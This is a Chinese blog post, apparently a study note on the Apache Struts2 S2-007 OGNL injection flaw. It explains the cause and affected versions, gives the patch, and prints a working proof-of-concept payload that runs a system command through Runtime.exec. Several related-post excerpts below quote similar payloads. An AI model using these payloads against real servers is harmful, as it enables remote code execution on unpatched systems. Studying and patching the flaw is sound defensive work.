(注入)(RCE)(Struts2)s2-007漏洞学习笔记

原创 于 2024-07-19 23:30:50 发布 · 454 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#struts #学习 #笔记 #web安全 #网络安全

写在前面

这篇文章是关于作者学习s2-007漏洞的笔记
关于这篇文章,如果有建议或问题请留言或联系h3llow0rld@foxmail.com

正文

漏洞分析

漏洞详情页
环境获取
如果想远程调试,参考这篇文章

影响版本

Struts 2.0.0 - Struts 2.2.3

漏洞原理

struts2可以为表单的每个字段设置限定条件并且能依据条件进行简单的类型转换,如果类型转换错误,拦截器会将用户的输入取出,进行字符串拼接后插入值栈,然后对标签进行二次表达式解析,造成OGNL注入

// com.opensymphony.xwork2.interceptor.ConversionErrorInterceptor#getOverrideExpr
protected Object getOverrideExpr(ActionInvocation invocation, Object value) {  
    return "'" + value + "'";  
}
利用条件/测试场景

1.利用条件
有表单,并且应用为表单配置了对应的Validation.xml规则文件
2.测试场景
只要存在表单就可以使用payload进行测试

利用方法

PoC:' + (#_memberAccess["allowStaticMethodAccess"]=true,#context["xwork.MethodAccessor.denyMethodExecution"]=false,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())) + '

如何修复
紧急处理方法(仅供参考)

删掉对应的Validation.xml,手动实现对字段的校验和转换

补丁修复方法

对输入进行转义

// com.opensymphony.xwork2.interceptor.ConversionErrorInterceptor#getOverrideExpr
protected Object getOverrideExpr(ActionInvocation invocation, Object value) {  
    ValueStack stack = invocation.getStack();  
  
    try {  
        stack.push(value);  
  
        return escape(stack.findString("top"));  
    } finally {  
        stack.pop();  
    }  
}
h4ckb0ss
关注
[旧文系列] Struts2历史高危漏洞系列-part2:S2-007/S2-008/S2-009
mole_exp的博客
01-18 2430
文章目录关于<旧文系列>前言S2-007漏洞复现与分析可回显PoC漏洞修复S2-008漏洞复现与分析Vuln-1:Remote command execution in CookieInterceptorVuln-2:Remote command execution in DebuggingInterceptorVuln-2:可回显PoC漏洞修复S2-009漏洞复现与分析可回显PoC漏洞修复Reference 关于<旧文系列> <旧文系列>系列是笔者将以前发到其他地方的技
Struts2 S2-046漏洞复现 (CVE-2017-5638)
1
05-27 4489
一:漏洞介绍 名称: struts2-046 远程代码执行 (CVE-2017-5638) 描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。 攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导
S2-007 远程代码执行漏洞
EC_Carrot的博客
08-07 703
漏洞简介 影响版本: 2.0.0 - 2.2.3 漏洞详细还是移步到这篇文章 漏洞复现 将exp传入可利用的age输入框里即可运行命令: ' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(
s2-007远程代码执行漏洞
yc11223344的博客
05-06 594
age来自于用户输入,传递一个非整数给id导致错误,struts会将用户的输入当作ongl表达式执行,从而导致了漏洞。 在本地启动环境:虚拟机ip:8080 由于这个漏洞是在发生在age属性,所以直接对age进行payload执行,也可以在name和email进行测试,但是没有用。 执行whoami命令 ' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["x.
S2-007漏洞复现
baidu_38844729的博客
11-14 372
漏洞原理 当用户提交 age 为字符串而非整形数值时,后端用代码拼接 "'" + value + "'" 然后对其进行 OGNL 表达式解析。要成功利用,只需要找到一个配置了类似验证规则的表单字段使之转换出错,借助类似 SQLi 注入单引号拼接的方式即可注入任意 OGNL 表达式。 影响版本:Struts2 2.0.0 - Struts2 2.2.3 漏洞利用 访问页面 http://local...
漏洞复现----29、Struts2/S2-007
七天
06-29 2202
影响版本 2.0.0 - 2.2.3 漏洞原理 参考 http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html 当配置了验证规则 -validation.xml 时,若类型验证转换出错,后端默认会将用户提交的表单值通过字符串拼接,然后执行一次 OGNL 表达式解析并返回。例如这里有一个 UserAction: () public class UserAction extends Ac
struts2反序列化漏洞,存在s2-005、s2-016、s2-016_3、s2-017
08-28
首先,s2-005漏洞(CVE-2012-0881)是2012年发现的一个严重问题,它涉及到Struts2的OGNL(Object-Graph Navigation Language)表达式在反序列化过程中的不当处理。OGNL是一种强大的表达式语言,允许动态访问和操作...
Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530)
qq_68163788的博客
06-25 750
Struts2框架是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了API,鼓励开发者采用MVC架构。Struts2WebWork优秀的设计思想为核心,吸收了Struts框架的部分优点,提供了一个更加整洁的MVC设计模式实现的Web应用程序框架。
[Vulhub] Struts2 S2-057 S2-059 S2-061 漏洞复现
weixin_45605352的博客
06-07 1802
Struts2 S2-057 RCE (CVE-2018-11776) 0x00 漏洞描述 Apache Struts是一个现在较为主流的开源框架,是用于使用Java编程语言开发Web应用程序。 定义XML配置时如果namespace值未设置且上层动作配置(Action Configuration)中未设置或用通配符namespace时可能会导致远程代码执行。 url标签未设置value和action值且上层动作未设置或用通配符namespace时可能会导致远程代码执行。 0x01 影响版本 Stru
struts2-OGNL表达式测试
09-28
struts2-OGNL表达式测试代码
0x21.Apache Struts2远程代码执行漏洞(S2-007)复现
qq_31679787的博客
10-16 8071
s2-007:当配置了验证规则,类型转换出错时,进行了错误的字符串拼接,进而造成了OGNL语句的执行; 抓包,在age值处输入poc; poc:'+(#application)+' 判断出在age输入框存在s2-007漏洞; 输入poc查找key文件位置,得到key值; poc:%27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%...
墨者学院-Apache Struts2远程代码执行漏洞(S2-007)复现
JimWu的博客
09-04 970
Apache Struts2远程代码执行漏洞(S2-007)复现 难易程度:★★ 题目类型:命令执行 使用工具:FireFox浏览器 漏洞原理: 当提交表单中变量的类型出现错误时,进行了错误的字符串拼接,后端会执行OGNL表达式。 1.打开靶场,了解S2-007漏洞是当提交表单中变量的类型出现错误时,进行了错误的字符串拼接,后端会执行OGNL表达式2.测试一下哪个输入框存在漏洞。 最下的输...
BurpSuite插件 Struts2-RCE使用
不想当脚本小子的脚本小子
02-15 441
有道云笔记链接:http://note.youdao.com/noteshare?id=a080e661d6c199818ff90052185dbd39&sub=B8AFFBFA240147B3963094075DFFC4BF
Struts2著名RCE漏洞引发的十年之思
weixin_34018169的博客
04-19 1915
2007年7月23日发布的第一个Struts2漏洞S2-001到2017年12月发布的最新漏洞S2-055,跨度足足有十年,而漏洞的个数也升至55个。分析了Struts2的这55个漏洞发现,基本上是RCE、XSS、CSRF、DOS、目录遍历和其他功能缺陷漏洞等等。本篇文章,重点关注威胁性较大的那些著名RCE漏洞,也是***们比较喜欢利用的。 要说著名RCE(远程代码执行)漏洞Struts2框架...
(Injection)(RCE)(Struts2)(笔记)s2-001漏洞学习笔记
最新发布
aaaadoga的博客
07-17 1156
这篇文章是关于作者学习s2-001漏洞笔记对于一个从事安全方向的人,漏洞复现和学习是非常有必要的,一方面是面试时可能会问到;另一方面是学习这些漏洞可以了解漏洞一般是怎么产生的,有助于你自个去发掘0day;还有就是对于安全工具开发者,研究漏洞有助于编写自动化工具实现漏洞的自动检测和利用在我学习一个漏洞的时候,我会以下几个方面入手这个漏洞的原理是什么这个漏洞影响哪些版本这个漏洞在什么环境下能触发这个漏洞怎么利用这个漏洞怎么修复的紧急响应的处理方法最终补丁使用的方法。
S2-007 RCE复现
不想当脚本小子的脚本小子
02-07 168
有道云笔记: http://note.youdao.com/noteshare?id=16a69cebcf95d6fd1fc0b237e2efb449&sub=0D1C574E32824FFB9CA93DBA4E6B2279
java struts2 漏洞复现合集
whatday的专栏
08-31 9578
目录 一、S2-001复现 二、S2-005复现 三、S2-007复现 四、S2-008复现 五、S2-009复现 六、S2-012复现 七、S2-013复现 八、S2-015复现 九、S2-016复现 十、S2-045复现 十一、S2-048复现 十二、S2-052复现 十三、S2-053复现 十四、S2-057复现 十五、S2-019复现 十六、S2-devMode 复现 Apache Struts2 是一个基于MVC设计模式的Web应用框架,会对某些标签属性(比如 i
s2-007远程执行漏洞靶机练写poc和exp
rlenew的博客
12-06 390
漏洞原理 当用户提交 age 为字符串而非整形数值时,后端用代码拼接 “’” + value + “’” 然后对其进行 OGNL 表达式解析。要成功利用,只需要找到一个配置了类似验证规则的表单字段使之转换出错,借助类似 SQLi 注入单引号拼接的方式即可注入任意OGNL 表达式。 影响版本:Struts2 2.0.0 - Struts2 2.2.3 漏洞的利用过程网上有很多文章,在实验环境下。试图尽量接近实验环境进行编写poc,因此在这次的poc编写的时候,是利用BeautifulSoup获取input
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值